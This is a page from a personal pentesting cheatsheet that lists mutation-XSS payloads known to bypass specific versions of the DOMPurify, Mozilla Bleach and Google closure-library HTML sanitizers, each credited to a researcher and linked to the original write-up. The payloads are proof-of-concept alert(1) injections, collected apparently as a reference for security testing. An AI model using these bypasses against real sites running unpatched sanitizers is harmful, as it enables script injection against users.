My Pentesting Cheatsheet

Home
Preparation
Information Gathering
Vulnerability Assessment
Pentesting Machine
Enumeration
- NMAP Scan types explained
- Firewall and IDS/IPS Evasion
Footprinting
Web Information Gathering
Vulnerability Assessment
File Transfers
Shells & Payloads
- Reverse Shells + Bind + Web
Password Attacks
Attacking Common Services
- FTP
- SMB
Deobfuscation
File Inclusion
Metasploit
- msfvenom
Privilege Escalation
- Windows
Custom compiled files
XSS

Powered by GitBook

On this page

mXSS
/ Payload examples
DomPurify
Mozilla Bleach
Google closure-library

XSS

PreviousCustom compiled files

Last updated 25 days ago

mXSS

/ Payload examples

This page contains some examples of payloads used to bypass sanitizers in the past. There are many other examples but to avoid redundancy we will add only ones that include new vectors or techniques.

DomPurify

Mozilla Bleach

Google closure-library

Version

Payload

Credit

Additional links

Version

Payload

Credit

Additional links

Version

Payload

Credit

Additional links

2.0.0

<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">

Michał Bentkowski @SecurityMB

https://research.securitum.com/dompurify-bypass-using-mxss/

2.0.17

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

Michał Bentkowski @SecurityMB

https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/

2.0.17

<math><mtext><table><mglyph><style></mglyph><img&Tab;src=1&Tab;onerror=alert(1)>">

Gareth Heyes @garethheyes

https://portswigger.net/research/bypassing-dompurify-again-with-mutation-xss

2.0.17

<math><mtext><table><mglyph><style><math><table id=”</table>”><img src onerror=alert(1)”>

@sqrtrev @0xParrot @web_payload team @GuesserSuper

https://twitter.com/0xsapra/status/1307929537749999616?ref_src=twsrc%5Etfw

2.2.0

<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">

Daniel Santos @bananabr

https://vovohelo.medium.com/from-svg-and-back-yet-another-mutation-xss-via-namespace-confusion-for-dompurify-2-2-2-bypass-5d9ae8b1878f

2.2.3

<svg><xss><desc><noscript></noscript></desc><p></p><style><a title="</style><img src onerror=alert(1)>">

Michał Bentkowski @SecurityMB

https://twitter.com/SecurityMB/status/1341290687963262978

3.0.8

<svg><annotation-xml><foreignobject><style><img src='x' onerror='alert(1)'>">

Kévin - Mizu @kevin_mizu

https://mizu.re/post/playing-with-dompurify-ce-handling

3.1.0

n = 506; var payload = `${"<div>".repeat(n)}<table id="outer"><caption id="outer"><svg><desc><table id="inner"><caption id="inner"></caption></table></desc><style><a title="</style><img src onerror=alert(1)>"></a></style></svg></caption></table>${"</div>".repeat(n)}`;

N/A

3.1.7

<svg><a><foreignobject><a><table><a></table><style><!--</style></svg><a id="-><img src onerror=alert(1)>">.

Masato Kinugawa @kinugawamasato

https://x.com/kinugawamasato/status/1843687909431582830

3.1.0

<noscript><style></noscript><img src=x onerror=alert(1)>

Yaniv Nizry @YNizry

https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/

3.1.1

<svg><style><img src=x onerror=alert(1)>

Yaniv Nizry @YNizry

https://checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach/

3.2.3

<math><p></p><style></style></math>

Yaniv Nizry @YNizry

https://github.com/mozilla/bleach/security/advisories/GHSA-vv2x-vrpj-qqpq

v20190215

<noscript><p title="</noscript><img src=x onerror=alert(1)>">

Masato Kinugawa @kinugawamasato

https://github.com/google/closure-library/commit/c79ab48e8e962fee57e68739c00e16b9934c0ffa https://www.youtube.com/watch?v=lG7U3fuNw3A